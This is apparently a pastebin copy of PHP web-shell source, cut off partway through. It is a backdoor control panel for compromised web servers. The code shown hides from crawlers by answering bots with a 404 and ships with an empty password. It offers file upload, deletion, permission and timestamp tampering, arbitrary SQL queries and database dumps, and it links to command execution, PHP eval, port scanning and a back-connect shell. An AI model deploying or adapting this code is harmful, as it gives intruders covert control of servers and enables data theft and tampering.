ddjeDvGf

· 6 years ago · Aug 28, 2019, 01:08 AM
1<?php
2//ini_set('display_errors',1);
3@error_reporting(7);
4@session_start();
5@set_time_limit(0);
6@set_magic_quotes_runtime(0);
7if( strpos( strtolower( $_SERVER['HTTP_USER_AGENT'] ), 'bot' ) !== false ) {
8	header('HTTP/1.0 404 Not Found');
9	exit;
10}
11ob_start();
12$mtime = explode(' ', microtime());
13$starttime = $mtime[1] + $mtime[0];
14define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
15define('SELF', $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']);
16define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
17define('IS_GPC', get_magic_quotes_gpc());
18$dis_func = get_cfg_var('disable_functions');
19define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
20
21if( IS_GPC ) { 
22	$_POST = s_array($_POST);
23}
24$P = $_POST;
25unset($_POST);
26/*==========================================*/
27$pass  = '';
28
29$cookiepre = '';
30
31$cookiedomain = '';
32
33$cookiepath = '/';
34
35$cookielife = 86400;
36
37$charsetdb = array(
38	'utf-8'			=> 'utf8',
39	'big5'			=> 'big5',
40	'cp-866'		=> 'cp866',
41	'euc-jp'		=> 'ujis',
42	'euc-kr'		=> 'euckr',
43	'iso-8859-1'	=> 'latin1',
44	'koi8-r'		=> 'koi8r',
45	'koi8-u'		=> 'koi8u',
46	'windows-1252'	=> 'latin1',
47);
48
49$act = isset($P['act']) ? $P['act'] : '';
50$charset = isset($P['charset']) ? $P['charset'] : 'utf8';
51$doing = isset($P['doing']) ? $P['doing'] : '';
52
53for ($i=1;$i<=4;$i++) {
54	${'p'.$i} = isset($P['p'.$i]) ? $P['p'.$i] : '';
55}
56
57if (isset($charsetdb[$charset])) {
58	header("content-Type: text/html; charset=".$charset);
59}
60
61$timestamp = time();
62
63if ($act == "logout") {
64	scookie('loginpass', '', -86400 * 365);
65	@header('Location: '.SELF);
66	exit;
67}
68if($pass) {
69	if ($act == 'login') {
70		if ($pass == encode_pass($P['password'])) {
71			scookie('loginpass',encode_pass($P['password']));
72			@header('Location: '.SELF);
73			exit;
74		}
75	}
76	if (isset($_COOKIE['loginpass'])) {
77		if ($_COOKIE['loginpass'] != $pass) {
78			loginpage();
79		}
80	} else {
81		loginpage();
82	}
83}
84
85$errmsg = '';
86$uchar = '&#9650;';
87$dchar = '&#9660;';
88!$act && $act = 'file';
89
90$home_cwd = getcwd();
91if (isset($P['cwd']) && $P['cwd']) {
92	chdir($P['cwd']);
93} else {
94	chdir(SA_ROOT);
95}
96$cwd = getcwd();
97$web_cwd = $_SERVER['DOCUMENT_ROOT'];
98foreach (array('web_cwd','cwd','home_cwd') as $k) {
99	if (IS_WIN) {
100		$$k = str_replace('\\', '/', $$k);
101	}
102	if (substr($$k, -1) != '/') {
103		$$k = $$k.'/';
104	}
105}
106
107if ($act == 'phpinfo') {
108	if (IS_PHPINFO) {
109		phpinfo();
110		exit;
111	} else {
112		$errmsg = 'phpinfo() function has disabled';
113	}
114}
115
116if(!function_exists('scandir')) {
117	function scandir($cwd) {
118		$files = array();
119		$dh = opendir($cwd);
120		while ($file = readdir($dh)) {
121			$files[] = $file;
122		}
123		return $files ? $files : 0;
124	}
125}
126
127if ($act == 'down') {
128	if (is_file($p1) && is_readable($p1)) {
129		@ob_end_clean();
130		$fileinfo = pathinfo($p1);
131		if (function_exists('mime_content_type')) {
132			$type = @mime_content_type($p1);
133			header("Content-Type: ".$type);
134		} else {
135			header('Content-type: application/x-'.$fileinfo['extension']);
136		}
137		header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
138		header('Content-Length: '.sprintf("%u", @filesize($p1)));
139		@readfile($p1);
140		exit;
141	} else {
142		$errmsg = 'Can\'t read file';
143		$act = 'file';
144	}
145}
146?>
147<html>
148<head>
149<meta http-equiv="Content-Type" content="text/html; charset=<?php echo $charset;?>">
150<title><?php echo $_SERVER['SERVER_ADDR'];?></title>
151<style type="text/css">
152body,td{font: 12px Arial,Tahoma;line-height: 16px;}
153.input, select{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
154.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
155.red{color:#f00;}
156.black{color:#000;}
157.green{color:#090;}
158.b{font-weight:bold;}
159.bt {border-color:#b0b0b0;background:#3d3d3d;color:#fff;font:12px Arial,Tahoma;height:22px;}
160a {color: #00f;text-decoration:none;}
161a:hover{color: #f00;text-decoration:underline;}
162.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}
163.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;}
164.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffa;padding:5px 15px 5px 5px;}
165.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;}
166.head td span{font-weight:normal;}
167.infolist {padding:10px;margin:10px 0 20px 0;background:#F1F1F1;border:1px solid #ddd;}
168form{margin:0;padding:0;}
169h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
170ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
171u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
172.drives{padding:5px;}
173.drives span {margin:auto 7px;}
174</style>
175<script type="text/javascript">
176function checkall(form) {
177	for(var i=0;i<form.elements.length;i++) {
178		var e = form.elements[i];
179        if (e.type == 'checkbox') {
180			if (e.name != 'chkall' && e.name != 'saveasfile')
181				e.checked = form.chkall.checked;
182		}
183    }
184}
185function $(id) {
186	return document.getElementById(id);
187}
188function createdir(){
189	var newdirname;
190	newdirname = prompt('Please input the directory name:', '');
191	if (!newdirname) return;
192	g(null,null,'createdir',newdirname);
193}
194function fileperm(pfile, val){
195	var newperm;
196	newperm = prompt('Current dir/file:'+pfile+'\nPlease input new permissions:', val);
197	if (!newperm) return;
198	g(null,null,'fileperm',pfile,newperm);
199}
200function rename(oldname){
201	var newfilename;
202	newfilename = prompt('Filename:'+oldname+'\nPlease input new filename:', '');
203	if (!newfilename) return;
204	g(null,null,'rename',newfilename,oldname);
205}
206function createfile(){
207	var filename;
208	filename = prompt('Please input the file name:', '');
209	if (!filename) return;
210	g('editfile', null, null, filename);
211}
212function setdb(dbname) {
213	if(!dbname) return;
214	$('dbform').tablename.value='';
215	$('dbform').doing.value='';
216	if ($('dbform').sql_query)
217	{
218		$('dbform').sql_query.value='';
219	}
220	$('dbform').submit();
221}
222function setsort(k) {
223	$('dbform').order.value=k;
224	$('dbform').submit();
225}
226function settable(tablename,doing) {
227	if(!tablename) return;
228	if (doing) {
229		$('dbform').doing.value=doing;
230	} else {
231		$('dbform').doing.value='';
232	}
233	$('dbform').sql_query.value='';
234	$('dbform').tablename.value=tablename;
235	$('dbform').submit();
236}
237function s(act,cwd,p1,p2,p3,p4,charset) {
238	if(act != null) $('opform').act.value=act;
239	if(cwd != null) $('opform').cwd.value=cwd;
240	if(p1 != null) $('opform').p1.value=p1;
241	if(p2 != null) $('opform').p2.value=p2;
242	if(p3 != null) $('opform').p3.value=p3;
243	if(p4 != null) {$('opform').p4.value=p4;}else{$('opform').p4.value='';}
244	if(charset != null) $('opform').charset.value=charset;
245}
246function g(act,cwd,p1,p2,p3,p4,charset) {
247	s(act,cwd,p1,p2,p3,p4,charset);
248	$('opform').submit();
249}
250</script>
251</head>
252<body style="margin:0;table-layout:fixed; word-break:break-all">
253<?php
254
255formhead(array('name'=>'opform'));
256makehide('act', $act);
257makehide('cwd', $cwd);
258makehide('p1', $p1);
259makehide('p2', $p2);
260makehide('p3', $p3);
261makehide('p4', $p4);
262makehide('charset', $charset);
263formfoot();
264
265if(!function_exists('posix_getegid')) {
266	$user = @get_current_user();
267	$uid = @getmyuid();
268	$gid = @getmygid();
269	$group = "?";
270} else {
271	$uid = @posix_getpwuid(@posix_geteuid());
272	$gid = @posix_getgrgid(@posix_getegid());
273	$uid = $uid['uid'];
274	$user = $uid['name'];
275	$gid = $gid['gid'];
276	$group = $gid['name'];
277}
278?>
279<table width="100%" border="0" cellpadding="0" cellspacing="0">
280	<tr class="head">
281		<td><span style="float:right;"><?php echo @php_uname();?> / User:<?php echo $uid.' ( '.$user.' ) / Group: '.$gid.' ( '.$group.' )';?></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
282	</tr>
283	<tr class="alt1">
284		<td>
285			<span style="float:right;">Charset:
286			<?php
287			makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'onchange'=>'g(null,null,null,null,null,null,this.value);'));
288			?>
289			</span>
290			<a href="javascript:g('logout');">Logout</a> | 
291			<a href="javascript:g('file',null,'','','','','<?php echo $charset;?>');">File Manager</a> | 
292			<a href="javascript:g('mysqladmin',null,'','','','','<?php echo $charset;?>');">MYSQL Manager</a> | 
293			<a href="javascript:g('shell',null,'','','','','<?php echo $charset;?>');">Execute Command</a> | 
294			<a href="javascript:g('phpenv',null,'','','','','<?php echo $charset;?>');">PHP Variable</a> | 
295			<a href="javascript:g('portscan',null,'','','','','<?php echo $charset;?>');">Port Scan</a> | 
296			<a href="javascript:g('secinfo',null,'','','','','<?php echo $charset;?>');">Security information</a> | 
297			<a href="javascript:g('eval',null,'','','','','<?php echo $charset;?>');">Eval PHP Code</a>
298			<?php if (!IS_WIN) {?> | <a href="javascript:g('backconnect',null,'','','','','<?php echo $charset;?>');">Back Connect</a><?php }?>
299		</td>
300	</tr>
301</table>
302<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
303<?php
304$errmsg && m($errmsg);
305
306if ($act == 'file') {
307
308	
309	$dir_writeable = @is_writable($cwd) ? 'Writable' : 'Non-writable';
310	if (isset($p1)) {
311		switch($p1) {
312			case 'createdir':
313				
314				if ($p2) {
315					m('Directory created '.(@mkdir($cwd.$p2,0777) ? 'success' : 'failed'));
316				}
317				break;
318			case 'uploadFile':
319				
320				m('File upload '.(@move_uploaded_file($_FILES['uploadfile']['tmp_name'], $cwd.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
321				break;
322			case 'fileperm':
323				
324				if ($p2 && $p3) {
325					$p3 = base_convert($p3, 8, 10);
326					m('Set file permissions '.(@chmod($p2, $p3) ? 'success' : 'failed'));
327				}
328				break;
329			case 'rename':
330				
331				if ($p2 && $p3) {
332					m($p3.' renamed '.$p2.(@rename($p3, $p2) ? ' success' : ' failed'));
333				}
334				break;
335			case 'clonetime':
336				
337				if ($p2 && $p3) {
338					$time = @filemtime($p3);
339					m('Set file last modified '.(@touch($p2,$time,$time) ? 'success' : 'failed'));
340				}
341				break;
342			case 'settime':
343				
344				if ($p2 && $p3) {
345					$time = strtotime($p3);
346					m('Set file last modified '.(@touch($p2,$time,$time) ? 'success' : 'failed'));
347				}
348				break;
349			case 'delete':
350				
351				if ($P['dl']) {
352					$succ = $fail = 0;
353					foreach ($P['dl'] as $f) {
354						if (is_dir($cwd.$f)) {
355							if (@deltree($cwd.$f)) {
356								$succ++;
357							} else {
358								$fail++;
359							}
360						} else {
361							if (@unlink($cwd.$f)) {
362								$succ++;
363							} else {
364								$fail++;
365							}
366						}
367					}
368					m('Deleted folder/file(s) have finished, choose '.count($P['dl']).', success '.$succ.', fail '.$fail);
369				} else {
370					m('Please select folder/file(s)');
371				}
372				break;
373			case 'paste':
374				if($_SESSION['do'] == 'copy') {
375					foreach($_SESSION['dl'] as $f) {
376						copy_paste($_SESSION['c'],$f, $cwd);					
377					}
378				} elseif($_SESSION['do'] == 'move') {
379					foreach($_SESSION['dl'] as $f) {
380						@rename($_SESSION['c'].$f, $cwd.$f);
381					}
382				}
383				unset($_SESSION['do'], $_SESSION['dl'], $_SESSION['c']);
384				break;
385			default:
386				if($p1 == 'copy' || $p1 == 'move') {
387					if (isset($P['dl']) && count($P['dl'])) {
388						$_SESSION['do'] = $p1;
389						$_SESSION['dl'] = $P['dl'];
390						$_SESSION['c'] = $P['cwd'];
391						m('Have been copied to the session');
392					} else {
393						m('Please select folder/file(s)');
394					}
395				}
396				break;
397		}
398		echo "<script type=\"text/javascript\">$('opform').p1.value='';$('opform').p2.value='';</script>";
399	}
400	
401	$free = @disk_free_space($cwd);
402	!$free && $free = 0;
403	$all = @disk_total_space($cwd);
404	!$all && $all = 0;
405	$used = $all-$free;
406	p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)</h2>');
407
408	$cwd_links = '';
409	$path = explode('/', $cwd);
410	$n=count($path);
411	for($i=0;$i<$n-1;$i++) {
412		$cwd_links .= '<a href="javascript:g(\'file\', \'';
413		for($j=0;$j<=$i;$j++) {
414			$cwd_links .= $path[$j].'/';
415		}
416		$cwd_links .= '\');">'.$path[$i].'/</a>';
417	}
418
419?>
420<script type="text/javascript">
421document.onclick = shownav;
422function shownav(e){
423	var src = e?e.target:event.srcElement;
424	do{
425		if(src.id =="jumpto") {
426			$('inputnav').style.display = "";
427			$('pathnav').style.display = "none";
428			return;
429		}
430		if(src.id =="inputnav") {
431			return;
432		}
433		src = src.parentNode;
434	}while(src.parentNode)
435
436	$('inputnav').style.display = "none";
437	$('pathnav').style.display = "";
438}
439</script>
440<div style="background:#eee;margin-bottom:10px;">
441	<form onsubmit="g('file',this.cwd.value);return false;" method="POST" id="godir" name="godir">
442		<table id="pathnav" width="100%" border="0" cellpadding="5" cellspacing="0">
443			<tr>
444				<td width="100%"><?php echo $cwd_links.' - '.getChmod($cwd).' / '.PermsColor($cwd).getUser($cwd);?> (<?php echo $dir_writeable;?>)</td>
445				<td nowrap><input class="bt" id="jumpto" name="jumpto" value="Jump to" type="button"></td>
446			</tr>
447		</table>
448		<table id="inputnav" width="100%" border="0" cellpadding="5" cellspacing="0" style="display:none;">
449			<tr>
450				<td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($cwd);?>)</td>
451				<td width="100%"><input class="input" name="cwd" value="<?php echo $cwd;?>" type="text" style="width:99%;margin:0 8px;"></td>
452				<td nowrap><input class="bt" value="GO" type="submit"></td>
453			</tr>
454		</table>
455	</form>
456<?php
457	if (IS_WIN) {
458		$comma = '';
459		p('<div class="drives">');
460		foreach( range('A','Z') as $drive ) {
461			if (is_dir($drive.':/')) {
462				p($comma.'<a href="javascript:g(\'file\', \''.$drive.':/\');">'.$drive.':\</a>');
463				$comma = '<span>|</span>';
464			}
465		}
466		p('</div>');
467	}
468?>
469</div>
470<?php
471	p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
472	p('<tr class="alt1"><td colspan="6" style="padding:5px;line-height:20px;">');
473	p('<form action="'.SELF.'" method="POST" enctype="multipart/form-data"><div style="float:right;"><input name="uploadfile" value="" type="file" /> <input class="bt" value="Upload" type="submit" /><input name="charset" value="'.$charset.'" type="hidden" /><input type="hidden" name="p1" value="uploadFile"><input name="cwd" value="'.$cwd.'" type="hidden" /></div></form>');
474	p('<a href="javascript:g(\'file\', \''.str_replace('\\','/',$web_cwd).'\');">WebRoot</a>');
475	p(' | <a href="javascript:g(\'file\', \''.$home_cwd.'\');">ScriptPath</a>');
476	p(' | <a href="javascript:g(\'file\',\''.$cwd.'\',null,null,null,\'dir\');">View Writable Directory</a> ');
477	p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile();">Create File</a>');
478	p('</td></tr>');
479
480	$sort = array('filename', 1);
481	if($p1) {
482		if(preg_match('!s_([A-z_]+)_(\d{1})!', $p1, $match)) {
483			$sort = array($match[1], (int)$match[2]);
484		}
485	}
486
487	formhead(array('name'=>'flist'));
488	makehide('act','file');
489	makehide('p1','');
490	makehide('cwd',$cwd);
491	makehide('charset',$charset);
492	p('<tr class="head">');
493	p('<td width="2%" nowrap><input name="chkall" value="on" type="checkbox" onclick="checkall(this.form)" /></td>');
494	p('<td><a href="javascript:g(\'file\',null,\'s_filename_'.($sort[1]?0:1).'\');">Filename</a> '.($p1 == 's_filename_0' ? $dchar : '').($p1 == 's_filename_1' || !$p1 ? $uchar : '').'</td>');
495	p('<td width="16%"><a href="javascript:g(\'file\',null,\'s_mtime_'.($sort[1]?0:1).'\');">Last modified</a> '.($p1 == 's_mtime_0' ? $dchar : '').($p1 == 's_mtime_1' ? $uchar : '').'</td>');
496	p('<td width="10%"><a href="javascript:g(\'file\',null,\'s_size_'.($sort[1]?0:1).'\');">Size</a> '.($p1 == 's_size_0' ? $dchar : '').($p1 == 's_size_1' ? $uchar : '').'</td>');
497	p('<td width="20%">Chmod / Perms</td>');
498	p('<td width="22%">Action</td>');
499	p('</tr>');
500
501	
502	$dirdata=$filedata=array();
503
504	if ($p4 == 'dir') {
505		$dirdata = GetWDirList($cwd);
506		$filedata = array();
507	} else {
508		
509		$dirs = @scandir($cwd);
510		if ($dirs) {
511			$dirs = array_diff($dirs, array('.'));
512			foreach ($dirs as $file) {
513				$filepath=$cwd.$file;
514				if(@is_dir($filepath)){
515					$dirdb['filename']=$file;
516					$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
517					$dirdb['chmod']=getChmod($filepath);
518					$dirdb['perm']=PermsColor($filepath);
519					$dirdb['owner']=getUser($filepath);
520					$dirdb['link']=$filepath;
521					if ($file=='..') {
522						$dirdata['up']=1;
523					} else {
524						$dirdata[]=$dirdb;
525					}
526				} else {
527					$filedb['filename']=$file;
528					$filedb['size']=sprintf("%u", @filesize($filepath));
529					$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
530					$filedb['chmod']=getChmod($filepath);
531					$filedb['perm']=PermsColor($filepath);
532					$filedb['owner']=getUser($filepath);
533					$filedb['link']=$filepath;
534					$filedata[]=$filedb;
535				}
536			}
537			unset($dirdb);
538			unset($filedb);
539		}
540	}
541	$dir_i = '0';
542	if (isset($dirdata['up'])) {
543		$thisbg = bg();
544		p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
545		p('<td align="center">-</td><td nowrap colspan="5"><a href="javascript:g(\'file\',\''.getUpPath($cwd).'\');">Parent Directory</a></td>');
546		p('</tr>');
547	}
548	unset($dirdata['up']);
549	usort($dirdata, 'cmp');
550	usort($filedata, 'cmp');
551	foreach($dirdata as $key => $dirdb){
552		if($p1 == 'getsize' && $p2 == $dirdb['filename']) {
553			$attachsize = dirsize($p2);
554			$attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
555		} else {
556			$attachsize = '<a href="javascript:g(\'file\', null, \'getsize\', \''.$dirdb['filename'].'\');">Stat</a>';
557		}
558		$thisbg = bg();
559		p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
560		p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$dirdb['filename'].'"></td>');
561		p('<td><a href="javascript:g(\'file\',\''.$dirdb['link'].'\')">'.$dirdb['filename'].'</a></td>');
562		p('<td nowrap><a href="javascript:g(\'newtime\',null,\''.$dirdb['filename'].'\');">'.$dirdb['mtime'].'</a></td>');
563		p('<td nowrap>'.$attachsize.'</td>');
564		p('<td nowrap>');
565		p('<a href="javascript:fileperm(\''.$dirdb['filename'].'\', \''.$dirdb['chmod'].'\');">'.$dirdb['chmod'].'</a> / ');
566		p('<a href="javascript:fileperm(\''.$dirdb['filename'].'\', \''.$dirdb['chmod'].'\');">'.$dirdb['perm'].'</a>'.$dirdb['owner'].'</td>');
567		p('<td nowrap><a href="javascript:rename(\''.$dirdb['filename'].'\');">Rename</a></td>');
568		p('</tr>');
569		$dir_i++;
570	}
571
572	p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
573	$file_i = '0';
574
575	foreach($filedata as $key => $filedb){
576		$fileurl = '/'.str_replace($web_cwd,'',$filedb['link']);
577		$thisbg = bg();
578		p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
579		p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$filedb['filename'].'"></td>');
580		p('<td>'.((strpos($filedb['link'], $web_cwd) !== false) ? '<a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a>' : $filedb['filename']).'</td>');
581		p('<td nowrap><a href="javascript:g(\'newtime\',null,\''.$filedb['filename'].'\');">'.$filedb['mtime'].'</a></td>');
582		p('<td nowrap>'.sizecount($filedb['size']).'</td>');
583		p('<td nowrap>');
584		p('<a href="javascript:fileperm(\''.$filedb['filename'].'\', \''.$filedb['chmod'].'\');">'.$filedb['chmod'].'</a> / ');
585		p('<a href="javascript:fileperm(\''.$filedb['filename'].'\', \''.$filedb['chmod'].'\');">'.$filedb['perm'].'</a>'.$filedb['owner'].'</td>');
586		p('<td nowrap>');
587		p('<a href="javascript:g(\'down\',null,\''.$filedb['filename'].'\');">Down</a> | ');
588		p('<a href="javascript:g(\'editfile\',null,null,\''.$filedb['filename'].'\');">Edit</a> | ');
589		p('<a href="javascript:rename(\''.$filedb['filename'].'\');">Rename</a>');
590		p('</td></tr>');
591		$file_i++;
592	}
593	p('<tr class="'.bg().' head"><td colspan="5"><a href="#" onclick="$(\'flist\').p1.value=\'delete\';$(\'flist\').submit();">Delete</a> | <a href="#" onclick="$(\'flist\').p1.value=\'copy\';$(\'flist\').submit();">Copy</a> | <a href="#" onclick="$(\'flist\').p1.value=\'move\';$(\'flist\').submit();">Move</a>'.(isset($_SESSION['do']) && @count($_SESSION['dl']) ? ' | <a href="#" onclick="$(\'flist\').p1.value=\'paste\';$(\'flist\').submit();">Paste</a>' : '').'</td><td align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
594	p('</form></table>');
595}// end dir
596
597elseif ($act == 'mysqladmin') {
598	$order = isset($P['order']) ? $P['order'] : '';
599	$dbhost = isset($P['dbhost']) ? $P['dbhost'] : '';
600	$dbuser = isset($P['dbuser']) ? $P['dbuser'] : '';
601	$dbpass = isset($P['dbpass']) ? $P['dbpass'] : '';
602	$dbname = isset($P['dbname']) ? $P['dbname'] : '';
603	$tablename = isset($P['tablename']) ? $P['tablename'] : '';
604
605	if ($doing == 'dump') {
606		if (isset($P['bak_table']) && $P['bak_table']) {
607			$DB = new DB_MySQL;
608			$DB->charsetdb = $charsetdb;
609			$DB->charset = $charset;
610			$DB->connect($dbhost, $dbuser, $dbpass, $dbname);
611			if ($P['saveasfile'] && $P['bak_path']) {
612				$fp = @fopen($P['bak_path'],'w');
613				if ($fp) {
614					foreach($P['bak_table'] as $k => $v) {
615						if ($v) {
616							$DB->sqldump($v, $fp);
617						}
618					}
619					fclose($fp);				
620					$fileurl = str_replace(SA_ROOT,'',$P['bak_path']);
621					m('Database has backup to <a href="'.$fileurl.'" target="_blank">'.$P['bak_path'].'</a>');
622				} else {
623					m('Backup failed');
624				}
625			} else {
626				@ob_end_clean();
627				$filename = basename($dbname.'.sql');
628				header('Content-type: application/unknown');
629				header('Content-Disposition: attachment; filename='.$filename);
630				foreach($P['bak_table'] as $k => $v) {
631					if ($v) {
632						$DB->sqldump($v);
633					}
634				}
635				exit;
636			}
637			$DB->close();
638		} else {
639			m('Please choose the table');
640		}
641		$doing = '';
642	}
643
644	formhead(array('title'=>'MYSQL Manager', 'name'=>'dbform'));
645	makehide('act','mysqladmin');
646	makehide('doing',$doing);
647	makehide('charset', $charset);
648	makehide('tablename', $tablename);
649	makehide('order', $order);
650	p('<p>');
651	p('DBHost:');
652	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
653	p('DBUser:');
654	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
655	p('DBPass:');
656	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
657	makeinput(array('value'=>'Connect','type'=>'submit','class'=>'bt'));
658	p('</p>');
659
660	if ($dbhost && $dbuser && isset($dbpass)) {
661		
662		
663		$DB = new DB_MySQL;
664		$DB->charsetdb = $charsetdb;
665		$DB->charset = $charset;
666		$DB->connect($dbhost, $dbuser, $dbpass, $dbname);
667
668		
669		p('<p class="red">MySQL '.$DB->version().' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
670		$highver = $DB->version() > '4.1' ? 1 : 0;
671
672		
673		$query = $DB->query("SHOW DATABASES");
674		$dbs = array();
675		$dbs[] = '-- Select a database --';
676		while($db = $DB->fetch($query)) {
677			$dbs[$db['Database']] = $db['Database'];
678		}
679		makeselect(array('name'=>'dbname','option'=>$dbs,'selected'=>$dbname,'onchange'=>'setdb(this.options[this.selectedIndex].value)'));
680
681		if ($dbname) {
682			p('<p>Current dababase: <a href="javascript:setdb(\''.$dbname.'\');">'.$dbname.'</a>');
683			if ($tablename) {
684				p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> ]');
685			}
686			p('</p>');
687
688			$sql_query = isset($P['sql_query']) ? $P['sql_query'] : '';
689
690			if ($tablename && !$sql_query) {
691				$sql_query = "SELECT * FROM $tablename ORDER BY 1 DESC LIMIT 0, 30";
692			}
693			if ($tablename && $doing == 'structure') {
694				$sql_query = "SHOW FULL COLUMNS FROM $tablename;\n";
695				$sql_query .= "SHOW INDEX FROM $tablename;";
696			}
697			p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" onclick="$(\'doing\').value=\'\'" style="height:50px;" type="submit" value="Query" /></td></tr></table></p>');
698			if ($sql_query) {
699				$querys = @explode(';',$sql_query);
700				foreach($querys as $num=>$query) {
701					if ($query) {
702						p("<p class=\"red b\">Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</p>");
703						switch($DB->query_res($query))
704						{
705							case 0:
706								p('<h2>'.$DB->halt('Error').'</h2>');
707								break;	
708							case 1:
709								$result = $DB->query($query);
710								$tatol = $DB->num_rows($result);
711								p('<table border="0" cellpadding="3" cellspacing="0">');
712								p('<tr class="head">');
713								$fieldnum = @mysql_num_fields($result);
714								for($i=0;$i<$fieldnum;$i++){
715									p('<td nowrap>'.@mysql_field_name($result, $i).'</td>');
716								}
717								p('</tr>');
718								
719								if (!$tatol) {
720									p('<tr class="alt2" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'alt2\';"><td nowrap colspan="'.$fieldnum.'" class="red b">No records</td></tr>');
721								} else {
722									while($mn = $DB->fetch($result)){
723										$thisbg = bg();
724										p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
725										
726										foreach($mn as $key=>$inside){
727											p('<td nowrap>'.(($inside == null) ? '<i>null</i>' : html_clean($inside)).'</td>');
728										}
729										p('</tr>');
730										unset($b1);
731									}
732								}
733								p('</table>');
734								break;
735							case 2:
736								p('<h2>Affected Rows : '.$DB->affected_rows().'</h2>');
737								break;
738						}
739					}
740				}
741			} else {
742				$query = $DB->query("SHOW TABLE STATUS");
743				$table_num = $table_rows = $data_size = 0;
744				$tabledb = array();
745				while($table = $DB->fetch($query)) {
746					$data_size = $data_size + $table['Data_length'];
747					$table_rows = $table_rows + $table['Rows'];
748					$table_num++;
749					$tabledb[] = $table;
750				}
751				$data_size = sizecount($data_size);
752				unset($table);
753				if (count($tabledb)) {
754					if ($highver) {
755						$db_engine = $DB->fetch($DB->query("SHOW VARIABLES LIKE 'storage_engine';"));						
756						$db_collation = $DB->fetch($DB->query("SHOW VARIABLES LIKE 'collation_database';"));
757					}
758					$sort = array('Name', 1);
759					if($order) {
760						if(preg_match('!s_([A-z_]+)_(\d{1})!', $order, $match)) {
761							$sort = array($match[1], (int)$match[2]);
762						}
763					}
764					usort($tabledb, 'cmp');
765					p('<table border="0" cellpadding="0" cellspacing="0" id="lists">');
766					p('<tr class="head">');
767					p('<td width="2%"><input name="chkall" value="on" type="checkbox" onclick="checkall(this.form)" /></td>');
768					p('<td><a href="javascript:setsort(\'s_Name_'.($sort[1]?0:1).'\');">Name</a> '.($order == 's_Name_0' ? $dchar : '').($order == 's_Name_1' || !$order ? $uchar : '').'</td>');
769					p('<td><a href="javascript:setsort(\'s_Rows_'.($sort[1]?0:1).'\');">Rows</a>'.($order == 's_Rows_0' ? $dchar : '').($order == 's_Rows_1' ? $uchar : '').'</td>');
770					p('<td><a href="javascript:setsort(\'s_Data_length_'.($sort[1]?0:1).'\');">Data_length</a>'.($order == 's_Data_length_0' ? $dchar : '').($order == 's_Data_length_1' ? $uchar : '').'</td>');
771					p('<td><a href="javascript:setsort(\'s_Create_time_'.($sort[1]?0:1).'\');">Create_time</a>'.($order == 's_Create_time_0' ? $dchar : '').($order == 's_Create_time_1' ? $uchar : '').'</td>');
772					p('<td><a href="javascript:setsort(\'s_Update_time_'.($sort[1]?0:1).'\');">Update_time</a>'.($order == 's_Update_time_0' ? $dchar : '').($order == 's_Update_time_1' ? $uchar : '').'</td>');
773					if ($highver) {
774						p('<td>Engine</td>');
775						p('<td>Collation</td>');
776					}
777					p('<td>Other</td>');
778					p('</tr>');
779					foreach ($tabledb as $key => $table) {
780						$thisbg = bg();
781						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
